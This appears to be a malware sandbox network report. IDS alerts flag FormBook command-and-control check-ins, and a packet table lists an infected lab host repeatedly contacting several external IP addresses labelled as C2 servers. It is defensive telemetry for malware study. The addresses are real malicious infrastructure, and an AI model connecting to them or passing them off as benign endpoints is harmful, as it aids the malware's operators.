                                                                                                    2024-12-03T14:16:15.032437+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849716178.172.160.3080TCP
                                                                                                    2024-12-03T14:16:17.694627+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849717178.172.160.3080TCP
                                                                                                    2024-12-03T14:16:17.694627+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849717178.172.160.3080TCP
                                                                                                    2024-12-03T14:16:24.651040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849718194.58.112.17480TCP
                                                                                                    2024-12-03T14:16:27.379763+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849719194.58.112.17480TCP
                                                                                                    2024-12-03T14:16:30.070445+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849720194.58.112.17480TCP
                                                                                                    2024-12-03T14:16:32.676062+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849721194.58.112.17480TCP
                                                                                                    2024-12-03T14:16:32.676062+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849721194.58.112.17480TCP
                                                                                                    2024-12-03T14:16:40.180012+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849722134.122.191.18780TCP
                                                                                                    2024-12-03T14:16:42.851950+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849723134.122.191.18780TCP
                                                                                                    2024-12-03T14:16:45.554922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849724134.122.191.18780TCP
                                                                                                    2024-12-03T14:16:48.425225+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849725134.122.191.18780TCP
                                                                                                    2024-12-03T14:16:48.425225+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849725134.122.191.18780TCP
                                                                                                    2024-12-03T14:16:56.414347+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849726156.234.28.10180TCP
                                                                                                    2024-12-03T14:16:59.070611+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727156.234.28.10180TCP
                                                                                                    2024-12-03T14:17:01.749095+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849728156.234.28.10180TCP
                                                                                                    2024-12-03T14:17:04.451571+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849729156.234.28.10180TCP
                                                                                                    2024-12-03T14:17:04.451571+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849729156.234.28.10180TCP
                                                                                                    2024-12-03T14:17:11.302027+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849730209.74.79.4280TCP
                                                                                                    2024-12-03T14:17:13.915538+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849731209.74.79.4280TCP
                                                                                                    2024-12-03T14:17:16.650100+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849732209.74.79.4280TCP
                                                                                                    2024-12-03T14:17:19.301185+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849733209.74.79.4280TCP
                                                                                                    2024-12-03T14:17:19.301185+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849733209.74.79.4280TCP
                                                                                                    2024-12-03T14:17:26.277793+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849734208.91.197.2780TCP
                                                                                                    2024-12-03T14:17:28.977442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735208.91.197.2780TCP
                                                                                                    2024-12-03T14:17:31.687756+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849736208.91.197.2780TCP
                                                                                                    2024-12-03T14:17:34.812705+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849737208.91.197.2780TCP
                                                                                                    2024-12-03T14:17:34.812705+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849737208.91.197.2780TCP
                                                                                                    2024-12-03T14:17:42.176033+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849738185.101.158.11380TCP
                                                                                                    2024-12-03T14:17:44.847594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849739185.101.158.11380TCP
                                                                                                    2024-12-03T14:17:47.540609+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849740185.101.158.11380TCP
                                                                                                    2024-12-03T14:17:50.260075+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849741185.101.158.11380TCP
                                                                                                    2024-12-03T14:17:50.260075+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849741185.101.158.11380TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 3, 2024 14:15:50.647948980 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:50.768018007 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:15:50.768110991 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:50.817111969 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:50.937149048 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:15:52.395817041 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:15:52.395853996 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:15:52.396161079 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:52.397485018 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:15:52.397571087 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:52.399401903 CET4971380192.168.2.8172.67.218.146
                                                                                                    Dec 3, 2024 14:15:52.519280910 CET8049713172.67.218.146192.168.2.8
                                                                                                    Dec 3, 2024 14:16:08.172442913 CET4971480192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:08.293821096 CET8049714178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:08.293991089 CET4971480192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:08.308140993 CET4971480192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:08.428069115 CET8049714178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:09.697478056 CET8049714178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:09.697498083 CET8049714178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:09.697613955 CET4971480192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:09.820667028 CET4971480192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:10.843400955 CET4971580192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:11.022675037 CET8049715178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:11.023097038 CET4971580192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:11.043417931 CET4971580192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:11.164057970 CET8049715178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:12.321470976 CET8049715178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:12.321532965 CET8049715178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:12.321712971 CET4971580192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:12.554975986 CET4971580192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:13.574229002 CET4971680192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:13.694212914 CET8049716178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:13.694324970 CET4971680192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:13.709405899 CET4971680192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:13.829514027 CET8049716178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:13.829540014 CET8049716178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:15.032291889 CET8049716178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:15.032306910 CET8049716178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:15.032437086 CET4971680192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:15.211338043 CET4971680192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:16.230693102 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:16.350750923 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:16.351077080 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:16.361067057 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:16.481086969 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694446087 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694530010 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694627047 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:17.697212934 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:17.818075895 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:23.197443962 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.317433119 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:23.317528963 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.333029985 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.452996016 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.650866032 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.650974989 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.651040077 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:24.836127996 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:25.883570910 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.003599882 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:26.003707886 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.050920963 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.171634912 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379477024 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379671097 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379762888 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:27.554896116 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.574145079 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.694154024 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:28.694309950 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.709522963 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.829608917 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:28.829694986 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.021274090 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.070445061 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:30.144243956 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.144408941 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:30.211180925 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.229886055 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.349987984 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:31.350087881 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.360243082 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.480357885 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.675774097 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.675900936 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.676062107 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:32.678822041 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:32.798881054 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:38.537513971 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.658776045 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:38.659039974 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.673286915 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.793514013 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:40.180011988 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:40.302593946 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:40.302661896 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.198693037 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.318679094 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:41.318850040 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.339796066 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.459849119 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.851949930 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922683954 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922770977 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922776937 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922806978 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922873020 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922873020 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.923572063 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.923619032 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.923634052 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.923713923 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.971849918 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.971950054 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:43.871476889 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:43.991590977 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:43.991703033 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:44.039673090 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:44.163043022 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:44.163089037 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.554922104 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596532106 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596702099 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596708059 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596709013 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596822977 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596822977 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596829891 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596879959 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596879959 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.600630999 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.679457903 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.679816961 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.573740959 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.695359945 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:46.695455074 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.707627058 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.827804089 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424956083 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424982071 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424997091 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.425044060 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.425225019 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.425225019 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.429860115 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.549803019 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:54.754411936 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:54.874861002 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:54.874994993 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:54.913216114 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:55.033225060 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.414346933 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.493078947 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.493153095 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.493221045 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.493289948 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.534518957 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.534594059 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.433048010 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.552982092 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:57.553062916 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.568144083 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.688709974 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.070611000 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.136734009 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.136833906 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.136876106 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.136908054 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.190628052 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.190773964 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.089891911 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.211733103 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:00.211905003 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.226274014 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.346688032 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:00.346710920 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.749094963 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.784885883 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.784934044 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.784967899 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.785001040 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.869281054 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.869343996 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.761009932 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.881238937 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:02.881496906 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.890991926 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:03.011372089 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451384068 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451414108 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451425076 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451570988 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:04.464138031 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:04.584080935 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:09.910167933 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.030283928 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:10.030417919 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.043855906 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.211277008 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.301911116 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.301923990 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.302026987 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:11.554863930 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.573422909 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.693851948 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:12.693998098 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.707151890 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.827756882 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:13.915189028 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:13.915467978 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:13.915538073 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:14.215874910 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:15.237529039 CET4973280192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:15.358058929 CET8049732209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:15.358145952 CET4973280192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:15.372607946 CET4973280192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:15.493185043 CET8049732209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:15.493204117 CET8049732209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:16.649714947 CET8049732209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:16.649995089 CET8049732209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:16.650099993 CET4973280192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:16.883202076 CET4973280192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:17.934226036 CET4973380192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:18.054311037 CET8049733209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:18.054454088 CET4973380192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:18.174067020 CET4973380192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:18.294275999 CET8049733209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:19.300564051 CET8049733209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:19.301112890 CET8049733209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:19.301184893 CET4973380192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:19.302978992 CET4973380192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:19.422894001 CET8049733209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:24.905855894 CET4973480192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:25.026010036 CET8049734208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:25.026156902 CET4973480192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:25.121068954 CET4973480192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:25.241126060 CET8049734208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:26.277695894 CET8049734208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:26.277792931 CET4973480192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:26.633164883 CET4973480192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:26.758919954 CET8049734208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:27.651947975 CET4973580192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:27.771883011 CET8049735208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:27.771974087 CET4973580192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:27.787919998 CET4973580192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:27.908067942 CET8049735208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:28.977370977 CET8049735208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:28.977442026 CET4973580192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:29.289474964 CET4973580192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:29.409385920 CET8049735208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:30.308027983 CET4973680192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:30.428231955 CET8049736208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:30.428505898 CET4973680192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:30.443095922 CET4973680192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:30.564413071 CET8049736208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:30.564579010 CET8049736208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:31.687680006 CET8049736208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:31.687756062 CET4973680192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:31.945692062 CET4973680192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:32.065781116 CET8049736208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:32.964027882 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:33.084034920 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:33.084206104 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:33.093357086 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:33.213500023 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812501907 CET8049737208.91.197.27192.168.2.8
